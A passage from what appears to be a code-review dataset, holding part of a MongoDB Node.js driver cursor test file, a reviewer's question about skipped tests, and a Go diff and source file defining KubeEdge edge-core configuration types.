configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection .find({}) .map(function() { return { a: 1 }; }) .batchSize(5) .limit(10); cursor.each(function(err, doc) { test.equal(null, err); if (doc) { test.equal(1, doc.a); } else { client.close(); done(); } }); }); }); } }); /** * @ignore * @api private */ it('Should correctly apply map to forEach', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var collection = db.collection('map_forEach'); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection .find({}) .map(function() { return { a: 2 }; }) .map(function(x) { return { a: x.a * x.a }; }) .batchSize(5) .limit(10); cursor.forEach( function(doc) { test.equal(4, doc.a); }, function(err) { test.equal(null, err); client.close(); done(); } ); }); }); } }); /** * @ignore * @api private */ it('Should correctly apply multiple uses of map and apply forEach', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var collection = db.collection('map_mapmapforEach'); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection .find({}) .map(function() { return { a: 1 }; }) .batchSize(5) .limit(10); cursor.forEach( function(doc) { test.equal(1, doc.a); }, function(err) { test.equal(null, err); client.close(); done(); } ); }); }); } }); /** * @ignore * @api private */ it('Should correctly apply skip and limit to large set of documents', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var collection = db.collection('cursor_limit_skip_correctly'); // Insert x number of docs var ordered = collection.initializeUnorderedBulkOp(); for (var i = 0; i < 6000; i++) { ordered.insert({ a: i }); } ordered.execute({ w: 1 }, function(err) { test.equal(null, err); // Let's attempt to skip and limit collection .find({}) .limit(2016) .skip(2016) .toArray(function(err, docs) { test.equal(null, err); test.equal(2016, docs.length); client.close(); done(); }); }); }); } }); /** * @ignore */ it('should tail cursor using maxAwaitTimeMS for 3.2 or higher', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single'], mongodb: '>3.1.9' } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var options = { capped: true, size: 8 }; db.createCollection('should_await_data_max_awaittime_ms', options, function( err, collection ) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); var s = new Date(); // Create cursor with awaitdata, and timeout after the period specified var cursor = collection .find({}) .addCursorFlag('tailable', true) .addCursorFlag('awaitData', true) .maxAwaitTimeMS(500); cursor.each(function(err, result) { test.equal(null, err); if (result) { setTimeout(function() { cursor.kill(); }, 300); } else { test.ok(new Date().getTime() - s.getTime() >= 500); client.close(); done(); } }); }); }); }); } }); /** * @ignore * @api private */ it('Should not emit any events after close event emitted due to cursor killed', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var collection = db.collection('cursor_limit_skip_correctly'); // Insert x number of docs var ordered = collection.initializeUnorderedBulkOp(); for (var i = 0; i < 100; i++) { ordered.insert({ a: i }); } ordered.execute({ w: 1 }, function(err) { test.equal(null, err); // Let's attempt to skip and limit var cursor = collection.find({}).batchSize(10); cursor.on('data', function() { cursor.destroy(); }); cursor.on('close', function() { client.close(); done(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyExecuteEnsureIndexWithNoCallback', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('shouldCorrectlyExecuteEnsureIndexWithNoCallback', function( err, collection ) { test.equal(null, err); // ensure index of createdAt index collection.ensureIndex({ createdAt: 1 }, function(err) { test.equal(null, err); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Find with sort collection .find() .sort(['createdAt', 'asc']) .toArray(function(err, items) { test.equal(null, err); test.equal(1, items.length); client.close(); done(); }); }); }); }); }); } }); /** * @ignore * @api private */ it('Should correctly execute count on cursor with limit and skip', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 50; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('Should_correctly_execute_count_on_cursor_1_', function( err, collection ) { test.equal(null, err); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection.find({}); cursor .limit(100) .skip(0) .count(function(err, c) { test.equal(null, err); test.equal(50, c); var cursor = collection.find({}); cursor .limit(100) .skip(0) .toArray(function(err) { test.equal(null, err); test.equal(50, c); client.close(); done(); }); }); }); }); }); } }); /** * @ignore * @api private */ it('Should correctly handle negative batchSize and set the limit', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; var configuration = this.configuration; var Long = configuration.require.Long; for (var i = 0; i < 50; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('Should_correctly_execute_count_on_cursor_1_', function( err, collection ) { test.equal(null, err); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection.find({}); cursor.batchSize(-10).next(function(err) { test.equal(null, err); test.ok(cursor.cursorState.cursorId.equals(Long.ZERO)); client.close(); done(); }); }); }); }); } }); it('Correcly decorate the cursor count command with skip, limit, hint, readConcern', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var started = []; var listener = require('../..').instrument(function(err) { test.equal(null, err); }); listener.on('started', function(event) { if (event.commandName === 'count') started.push(event); }); var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); db .collection('cursor_count_test', { readConcern: { level: 'local' } }) .find({ project: '123' }) .limit(5) .skip(5) .hint({ project: 1 }) .count(true, function(err) { test.equal(null, err); test.equal(1, started.length); if (started[0].command.readConcern) test.deepEqual({ level: 'local' }, started[0].command.readConcern); test.deepEqual({ project: 1 }, started[0].command.hint); test.equal(5, started[0].command.skip); test.equal(5, started[0].command.limit); listener.uninstrument(); client.close(); done(); }); }); } }); it('Correcly decorate the collection cursor count command with skip, limit, hint, readConcern', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var started = []; var listener = require('../..').instrument(function(err) { test.equal(null, err); }); listener.on('started', function(event) { if (event.commandName === 'count') started.push(event); }); var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); db.collection('cursor_count_test1', { readConcern: { level: 'local' } }).count( { project: '123' }, { readConcern: { level: 'local' }, limit: 5, skip: 5, hint: { project: 1 } }, function(err) { test.equal(null, err); test.equal(1, started.length); if (started[0].command.readConcern) test.deepEqual({ level: 'local' }, started[0].command.readConcern); test.deepEqual({ project: 1 }, started[0].command.hint); test.equal(5, started[0].command.skip); test.equal(5, started[0].command.limit); listener.uninstrument(); client.close(); done(); } ); }); } }); it('Should properly kill a cursor', { metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'], mongodb: '>=3.2.0' } }, // The actual test we wish to run test: function() { // Load up the documents const docs = []; for (let i = 0; i < 1000; i += 1) { docs.push({ a: i }); } const configuration = this.configuration; const client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); let cleanup = () => {}; let caughtError = undefined; return ( client // Connect .connect() .then(function(client) { cleanup = () => client.close(); const db = client.db(configuration.db); const collection = db.collection('cursorkilltest1'); // Insert 1000 documents return collection.insert(docs).then(() => { // Generate cursor for find operation const cursor = collection.find({}); // Iterate cursor past first element return cursor .next() .then(() => cursor.next()) .then(() => { // Confirm that cursorId is non-zero const longId = cursor.cursorState.cursorId; expect(longId) .to.be.an('object') .and.to.haveOwnProperty('_bsontype', 'Long'); const id = longId.toNumber(); expect(id).to.not.equal(0); // Kill cursor return new Promise((resolve, reject) => cursor.kill((err, r) => (err ? reject(err) : resolve(r))) ).then(response => { // sharded clusters will return a long, single return integers if ( response && response.cursorsKilled && Array.isArray(response.cursorsKilled) ) { response.cursorsKilled = response.cursorsKilled.map( id => (typeof id === 'number' ? Long.fromNumber(id) : id) ); } expect(response.ok).to.equal(1); expect(response.cursorsKilled[0].equals(longId)).to.be.ok; cursor.close(); client.close(); }); }); }); }) // Clean up. Make sure that even in case of error, we still always clean up connection .catch(e => (caughtError = e)) .then(cleanup) .then(() => { if (caughtError) { throw caughtError; } }) ); } }); // NOTE: This is skipped because I don't think its correct or adds value. The expected error // is not an error with hasNext (from server), but rather a local TypeError which should // be caught anyway. The only solution here would be to wrap the entire top level call // in a try/catch which is not going to happen. it.skip('Should propagate hasNext errors when using a callback', { metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, test: function(done) { var configuration = this.configuration; var client = configuration.newClient({ w: 1 }, { poolSize: 1, auto_reconnect: false }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var findCommand = { find: 'integration_tests.has_next_error_callback', limit: 0, skip: 0, query: {}, slaveOk: false }; var cursor = db.s.topology.cursor(db.s.namespace, findCommand, { readPreference: 42 }); cursor.hasNext(function(err) { test.ok(err !== null); test.equal(err.message, 'readPreference must be a ReadPreference instance'); done(); }); }); } }); it( 'should return implicit session to pool when client-side cursor exhausts results on initial query', { metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'], mongodb: '>=3.6.0' } }, test: function(done) { const configuration = this.configuration; const client = configuration.newClient({ w: 1 }, { poolSize: 1, auto_reconnect: false }); client.connect(function(err, client) { test.equal(null, err); const db = client.db(configuration.db); const collection = db.collection('cursor_session_tests'); collection.insertMany([{ a: 1, b: 2 }], function(err) { test.equal(null, err); const cursor = collection.find({}); cursor.next(function() { test.equal(client.topology.s.sessions.length, 0); client.close(); done(); }); }); }); } } ); it( 'should return implicit session to pool when client-side cursor exhausts results after a getMore', { metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'], mongodb: '>=3.6.0' } }, test: function(done) { const configuration = this.configuration; const client = configuration.newClient({ w: 1 }, { poolSize: 1, auto_reconnect: false }); client.connect(function(err, client) { test.equal(null, err); const db = client.db(configuration.db); const collection = db.collection('cursor_session_tests2'); const docs = [ { a: 1, b: 2 }, { a: 3, b: 4 }, { a: 5, b: 6 }, { a: 7, b: 8 }, { a: 9, b: 10 } ]; collection.insertMany(docs, function(err) { test.equal(null, err); const cursor = collection.find({}, { batchSize: 3 }); cursor.next(function() { test.equal(client.topology.s.sessions.length, 1); cursor.next(function() { test.equal(client.topology.s.sessions.length, 1); cursor.next(function() { test.equal(client.topology.s.sessions.length, 1); cursor.next(function() { test.equal(client.topology.s.sessions.length, 0); client.close(); done(); }); }); }); }); }); }); } } ); it('should return a promise when no callback supplied to forEach method', function(done) { const configuration = this.configuration; const client = configuration.newClient({ w: 1 }, { poolSize: 1, auto_reconnect: false }); client.connect(function(err, client) { const db = client.db(configuration.db); const collection = db.collection('cursor_session_tests2'); const cursor = collection.find(); expect(cursor.forEach()).to.exist.and.to.be.an.instanceof(cursor.s.promiseLibrary); cursor.close(() => client.close(() => done())); }); }); it('should return false when exhausted and hasNext called more than once', function(done) { const configuration = this.configuration; const client = configuration.newClient({ w: 1 }, { poolSize: 1, auto_reconnect: false }); client.connect(function(err, client) { const db = client.db(configuration.db); db.createCollection('cursor_hasNext_test').then(function() { const cursor = db.collection('cursor_hasNext_test').find(); cursor .hasNext() .then(function(val1) { expect(val1).to.equal(false); return cursor.hasNext(); }) .then(function(val2) { expect(val2).to.equal(false); cursor.close(() => client.close(() => done())); }) .catch(err => { cursor.close(() => client.close(() => done(err))); }); }); }); }); function testTransformStream(config, done) { const client = config.client; const configuration = config.configuration; const collectionName = config.collectionName; const transformFunc = config.transformFunc; const expectedSet = config.expectedSet; client.connect(function(err, client) { const db = client.db(configuration.db); let collection, cursor; const docs = [ { _id: 0, a: { b: 1, c: 0 } }, { _id: 1, a: { b: 1, c: 0 } }, { _id: 2, a: { b: 1, c: 0 } } ]; const resultSet = new Set(); const transformParam = transformFunc != null ? { transform: transformFunc } : null; const close = e => cursor.close(() => client.close(() => done(e))); Promise.resolve() .then(() => db.createCollection(collectionName)) .then(() => (collection = db.collection(collectionName))) .then(() => collection.insertMany(docs)) .then(() => collection.find()) .then(_cursor => (cursor = _cursor)) .then(() => cursor.transformStream(transformParam)) .then(stream => { stream.on('data', function(doc) { resultSet.add(doc); }); stream.once('end', function() { expect(resultSet).to.deep.equal(expectedSet); close(); }); stream.once('error', function(e) { close(e); }); }) .catch(e => close(e)); }); } it('transformStream should apply the supplied transformation function to each document in the stream', function(done) { const configuration = this.configuration; const client = configuration.newClient({ w: 1 }, { poolSize: 1, auto_reconnect: false }); const expectedDocs = [{ _id: 0, b: 1, c: 0 }, { _id: 1, b: 1, c: 0 }, { _id: 2, b: 1, c: 0 }]; const config = { client: client, configuration: configuration, collectionName: 'transformStream-test-transform', transformFunc: doc => ({ _id: doc._id, b: doc.a.b, c: doc.a.c }), expectedSet: new Set(expectedDocs) }; testTransformStream(config, done); }); it('transformStream should return a stream of unmodified docs if no transform function applied', function(done) { const configuration = this.configuration; const client = configuration.newClient({ w: 1 }, { poolSize: 1, auto_reconnect: false }); const expectedDocs = [ { _id: 0, a: { b: 1, c: 0 } }, { _id: 1, a: { b: 1, c: 0 } }, { _id: 2, a: { b: 1, c: 0 } } ]; const config = { client: client, configuration: configuration, collectionName: 'transformStream-test-notransform', transformFunc: null, expectedSet: new Set(expectedDocs) }; testTransformStream(config, done); }); it('should apply parent read preference to count command', function(done) { const configuration = this.configuration; const ReadPreference = this.configuration.require.ReadPreference; const client = configuration.newClient( { w: 1, readPreference: ReadPreference.SECONDARY }, { poolSize: 1, auto_reconnect: false, connectWithNoPrimary: true } ); client.connect(function(err, client) { expect(err).to.not.exist; const db = client.db(configuration.db); let collection, cursor, spy; const close = e => cursor.close(() => client.close(() => done(e))); Promise.resolve() .then(() => new Promise(resolve => setTimeout(() => resolve(), 500))) .then(() => db.createCollection('test_count_readPreference')) .then(() => (collection = db.collection('test_count_readPreference'))) .then(() => collection.find()) .then(_cursor => (cursor = _cursor)) .then(() => (spy = sinon.spy(cursor.s.topology, 'command'))) .then(() => cursor.count()) .then(() => expect(spy.firstCall.args[2]) .to.have.nested.property('readPreference.mode') .that.equals('secondary') ) .then(() => close()) .catch(e => close(e)); }); }); });
1
14,961
Why are these skipped?
mongodb-node-mongodb-native
js
@@ -388,6 +388,13 @@ type MetaManager struct { // RemoteQueryTimeout indicates remote query timeout (second) // default 60 RemoteQueryTimeout int32 `json:"remoteQueryTimeout,omitempty"` + // The config of MetaServer + MetaServer `json:"metaServer,omitempty"` +} + +type MetaServer struct { + Enable bool + Debug bool } // ServiceBus indicates the ServiceBus module config
1
/* Copyright 2019 The KubeEdge Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package v1alpha1 import ( "time" v1 "k8s.io/api/core/v1" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" metaconfig "github.com/kubeedge/kubeedge/pkg/apis/componentconfig/meta/v1alpha1" ) const ( EdgeMeshDefaultLoadBalanceStrategy = "RoundRobin" EdgeMeshDefaultInterface = "docker0" EdgeMeshDefaultSubNet = "9.251.0.0/16" EdgeMeshDefaultListenPort = 40001 ) const ( MqttModeInternal MqttMode = 0 MqttModeBoth MqttMode = 1 MqttModeExternal MqttMode = 2 ) const ( CGroupDriverCGroupFS = "cgroupfs" CGroupDriverSystemd = "systemd" ) const ( // DataBaseDriverName is sqlite3 DataBaseDriverName = "sqlite3" // DataBaseAliasName is default DataBaseAliasName = "default" // DataBaseDataSource is edge.db DataBaseDataSource = "/var/lib/kubeedge/edgecore.db" ) type ProtocolName string type MqttMode int // EdgeCoreConfig indicates the EdgeCore config which read from EdgeCore config file type EdgeCoreConfig struct { metav1.TypeMeta // DataBase indicates database info // +Required DataBase *DataBase `json:"database,omitempty"` // Modules indicates EdgeCore modules config // +Required Modules *Modules `json:"modules,omitempty"` } // DataBase indicates the database info type DataBase struct { // DriverName indicates database driver name // default "sqlite3" DriverName string `json:"driverName,omitempty"` // AliasName indicates alias name // default "default" AliasName string `json:"aliasName,omitempty"` // DataSource indicates the data source path // default "/var/lib/kubeedge/edgecore.db" DataSource string `json:"dataSource,omitempty"` } // Modules indicates the modules which edgeCore will be used type Modules struct { // Edged indicates edged module config // +Required Edged *Edged `json:"edged,omitempty"` // EdgeHub indicates edgeHub module config // +Required EdgeHub *EdgeHub `json:"edgeHub,omitempty"` // EventBus indicates eventBus config for edgeCore // +Required EventBus *EventBus `json:"eventBus,omitempty"` // MetaManager indicates meta module config // +Required MetaManager *MetaManager `json:"metaManager,omitempty"` // ServiceBus indicates serviceBus module config ServiceBus *ServiceBus `json:"serviceBus,omitempty"` // DeviceTwin indicates deviceTwin module config DeviceTwin *DeviceTwin `json:"deviceTwin,omitempty"` // DBTest indicates dbTest module config DBTest *DBTest `json:"dbTest,omitempty"` // EdgeMesh indicates edgeMesh module config // +Required EdgeMesh *EdgeMesh `json:"edgeMesh,omitempty"` // EdgeStream indicates edgestream module config // +Required EdgeStream *EdgeStream `json:"edgeStream,omitempty"` } // Edged indicates the config fo edged module // edged is lighted-kubelet type Edged struct { // Enable indicates whether edged is enabled, // if set to false (for debugging etc.), skip checking other edged configs. // default true Enable bool `json:"enable,omitempty"` // Labels indicates current node labels Labels map[string]string `json:"labels,omitempty"` // Annotations indicates current node annotations Annotations map[string]string `json:"annotations,omitempty"` // Taints indicates current node taints Taints []v1.Taint `json:"taints,omitempty"` // NodeStatusUpdateFrequency indicates node status update frequency (second) // default 10 NodeStatusUpdateFrequency int32 `json:"nodeStatusUpdateFrequency,omitempty"` // RuntimeType indicates cri runtime ,support: docker, remote // default "docker" RuntimeType string `json:"runtimeType,omitempty"` // DockerAddress indicates docker server address // default "unix:///var/run/docker.sock" DockerAddress string `json:"dockerAddress,omitempty"` // RemoteRuntimeEndpoint indicates remote runtime endpoint // default "unix:///var/run/dockershim.sock" RemoteRuntimeEndpoint string `json:"remoteRuntimeEndpoint,omitempty"` // RemoteImageEndpoint indicates remote image endpoint // default "unix:///var/run/dockershim.sock" RemoteImageEndpoint string `json:"remoteImageEndpoint,omitempty"` // NodeIP indicates current node ip // default get local host ip NodeIP string `json:"nodeIP"` // ClusterDNS indicates cluster dns // Note: Can not use "omitempty" option, It will affect the output of the default configuration file // +Required ClusterDNS string `json:"clusterDNS"` // ClusterDomain indicates cluster domain // Note: Can not use "omitempty" option, It will affect the output of the default configuration file ClusterDomain string `json:"clusterDomain"` // EdgedMemoryCapacity indicates memory capacity (byte) // default 7852396000 EdgedMemoryCapacity int64 `json:"edgedMemoryCapacity,omitempty"` // PodSandboxImage is the image whose network/ipc namespaces containers in each pod will use. // +Required // kubeedge/pause:3.1 for x86 arch // kubeedge/pause-arm:3.1 for arm arch // kubeedge/pause-arm64 for arm64 arch // default kubeedge/pause:3.1 PodSandboxImage string `json:"podSandboxImage,omitempty"` // ImagePullProgressDeadline indicates image pull progress dead line (second) // default 60 ImagePullProgressDeadline int32 `json:"imagePullProgressDeadline,omitempty"` // RuntimeRequestTimeout indicates runtime request timeout (second) // default 2 RuntimeRequestTimeout int32 `json:"runtimeRequestTimeout,omitempty"` // HostnameOverride indicates hostname // default os.Hostname() HostnameOverride string `json:"hostnameOverride,omitempty"` // RegisterNode enables automatic registration // default true RegisterNode bool `json:"registerNode,omitempty"` //RegisterNodeNamespace indicates register node namespace // default "default" RegisterNodeNamespace string `json:"registerNodeNamespace,omitempty"` // InterfaceName indicates interface name // default "eth0" // DEPRECATED after v1.5 InterfaceName string `json:"interfaceName,omitempty"` // ConcurrentConsumers indicates concurrent consumers for pod add or remove operation // default 5 ConcurrentConsumers int `json:"concurrentConsumers,omitempty"` // DevicePluginEnabled indicates enable device plugin // default false // Note: Can not use "omitempty" option, it will affect the output of the default configuration file DevicePluginEnabled bool `json:"devicePluginEnabled"` // GPUPluginEnabled indicates enable gpu plugin // default false, // Note: Can not use "omitempty" option, it will affect the output of the default configuration file GPUPluginEnabled bool `json:"gpuPluginEnabled"` // ImageGCHighThreshold indicates image gc high threshold (percent) // default 80 ImageGCHighThreshold int32 `json:"imageGCHighThreshold,omitempty"` // ImageGCLowThreshold indicates image gc low threshold (percent) // default 40 ImageGCLowThreshold int32 `json:"imageGCLowThreshold,omitempty"` // MaximumDeadContainersPerPod indicates max num dead containers per pod // default 1 MaximumDeadContainersPerPod int32 `json:"maximumDeadContainersPerPod,omitempty"` // CGroupDriver indicates container cgroup driver, support: cgroupfs, systemd // default "cgroupfs" // +Required CGroupDriver string `json:"cgroupDriver,omitempty"` // NetworkPluginName indicates the name of the network plugin to be invoked, // if an empty string is specified, use noop plugin // default "" NetworkPluginName string `json:"networkPluginName,omitempty"` // CNIConfDir indicates the full path of the directory in which to search for CNI config files // default "/etc/cni/net.d" CNIConfDir string `json:"cniConfDir,omitempty"` // CNIBinDir indicates a comma-separated list of full paths of directories // in which to search for CNI plugin binaries // default "/opt/cni/bin" CNIBinDir string `json:"cniBinDir,omitempty"` // CNICacheDir indicates the full path of the directory in which CNI should store cache files // default "/var/lib/cni/cache" CNICacheDir string `json:"cniCacheDirs,omitempty"` // NetworkPluginMTU indicates the MTU to be passed to the network plugin // default 1500 NetworkPluginMTU int32 `json:"networkPluginMTU,omitempty"` // CgroupsPerQOS enables QoS based Cgroup hierarchy: top level cgroups for QoS Classes // And all Burstable and BestEffort pods are brought up under their // specific top level QoS cgroup. // Default: true CgroupsPerQOS bool `json:"cgroupsPerQOS"` // CgroupRoot is the root cgroup to use for pods. // If CgroupsPerQOS is enabled, this is the root of the QoS cgroup hierarchy. // Default: "" CgroupRoot string `json:"cgroupRoot"` // EdgeCoreCgroups is the absolute name of cgroups to isolate the edgecore in // Dynamic Kubelet Config (beta): This field should not be updated without a full node // reboot. It is safest to keep this value the same as the local config. // Default: "" EdgeCoreCgroups string `json:"edgeCoreCgroups,omitempty"` // systemCgroups is absolute name of cgroups in which to place // all non-kernel processes that are not already in a container. Empty // for no container. Rolling back the flag requires a reboot. // Dynamic Kubelet Config (beta): This field should not be updated without a full node // reboot. It is safest to keep this value the same as the local config. // Default: "" SystemCgroups string `json:"systemCgroups,omitempty"` // How frequently to calculate and cache volume disk usage for all pods // Dynamic Kubelet Config (beta): If dynamically updating this field, consider that // shortening the period may carry a performance impact. // Default: "1m" VolumeStatsAggPeriod time.Duration `json:"volumeStatsAggPeriod,omitempty"` // EnableMetrics indicates whether enable the metrics // default true EnableMetrics bool `json:"enableMetrics,omitempty"` } // EdgeHub indicates the EdgeHub module config type EdgeHub struct { // Enable indicates whether EdgeHub is enabled, // if set to false (for debugging etc.), skip checking other EdgeHub configs. // default true Enable bool `json:"enable,omitempty"` // Heartbeat indicates heart beat (second) // default 15 Heartbeat int32 `json:"heartbeat,omitempty"` // ProjectID indicates project id // default e632aba927ea4ac2b575ec1603d56f10 ProjectID string `json:"projectID,omitempty"` // TLSCAFile set ca file path // default "/etc/kubeedge/ca/rootCA.crt" TLSCAFile string `json:"tlsCaFile,omitempty"` // TLSCertFile indicates the file containing x509 Certificate for HTTPS // default "/etc/kubeedge/certs/server.crt" TLSCertFile string `json:"tlsCertFile,omitempty"` // TLSPrivateKeyFile indicates the file containing x509 private key matching tlsCertFile // default "/etc/kubeedge/certs/server.key" TLSPrivateKeyFile string `json:"tlsPrivateKeyFile,omitempty"` // Quic indicates quic config for EdgeHub module // Optional if websocket is configured Quic *EdgeHubQUIC `json:"quic,omitempty"` // WebSocket indicates websocket config for EdgeHub module // Optional if quic is configured WebSocket *EdgeHubWebSocket `json:"websocket,omitempty"` // Token indicates the priority of joining the cluster for the edge Token string `json:"token"` // HTTPServer indicates the server for edge to apply for the certificate. HTTPServer string `json:"httpServer,omitempty"` // RotateCertificates indicates whether edge certificate can be rotated // default true RotateCertificates bool `json:"rotateCertificates,omitempty"` } // EdgeHubQUIC indicates the quic client config type EdgeHubQUIC struct { // Enable indicates whether enable this protocol // default false Enable bool `json:"enable,omitempty"` // HandshakeTimeout indicates hand shake timeout (second) // default 30 HandshakeTimeout int32 `json:"handshakeTimeout,omitempty"` // ReadDeadline indicates read dead line (second) // default 15 ReadDeadline int32 `json:"readDeadline,omitempty"` // Server indicates quic server address (ip:port) // +Required Server string `json:"server,omitempty"` // WriteDeadline indicates write dead line (second) // default 15 WriteDeadline int32 `json:"writeDeadline,omitempty"` } // EdgeHubWebSocket indicates the websocket client config type EdgeHubWebSocket struct { // Enable indicates whether enable this protocol // default true Enable bool `json:"enable,omitempty"` // HandshakeTimeout indicates handshake timeout (second) // default 30 HandshakeTimeout int32 `json:"handshakeTimeout,omitempty"` // ReadDeadline indicates read dead line (second) // default 15 ReadDeadline int32 `json:"readDeadline,omitempty"` // Server indicates websocket server address (ip:port) // +Required Server string `json:"server,omitempty"` // WriteDeadline indicates write dead line (second) // default 15 WriteDeadline int32 `json:"writeDeadline,omitempty"` } // EventBus indicates the event bus module config type EventBus struct { // Enable indicates whether EventBus is enabled, if set to false (for debugging etc.), // skip checking other EventBus configs. // default true Enable bool `json:"enable,omitempty"` // MqttQOS indicates mqtt qos // 0: QOSAtMostOnce, 1: QOSAtLeastOnce, 2: QOSExactlyOnce // default 0 // Note: Can not use "omitempty" option, It will affect the output of the default configuration file MqttQOS uint8 `json:"mqttQOS"` // MqttRetain indicates whether server will store the message and can be delivered to future subscribers, // if this flag set true, sever will store the message and can be delivered to future subscribers // default false // Note: Can not use "omitempty" option, It will affect the output of the default configuration file MqttRetain bool `json:"mqttRetain"` // MqttSessionQueueSize indicates the size of how many sessions will be handled. // default 100 MqttSessionQueueSize int32 `json:"mqttSessionQueueSize,omitempty"` // MqttServerInternal indicates internal mqtt broker url // default "tcp://127.0.0.1:1884" MqttServerInternal string `json:"mqttServerInternal,omitempty"` // MqttServerExternal indicates external mqtt broker url // default "tcp://127.0.0.1:1883" MqttServerExternal string `json:"mqttServerExternal,omitempty"` // MqttMode indicates which broker type will be choose // 0: internal mqtt broker enable only. // 1: internal and external mqtt broker enable. // 2: external mqtt broker enable only // +Required // default: 2 MqttMode MqttMode `json:"mqttMode"` // Tls indicates tls config for EventBus module TLS *EventBusTLS `json:"eventBusTLS,omitempty"` } // EventBusTLS indicates the EventBus tls config with MQTT broker type EventBusTLS struct { // Enable indicates whether enable tls connection // default false Enable bool `json:"enable,omitempty"` // 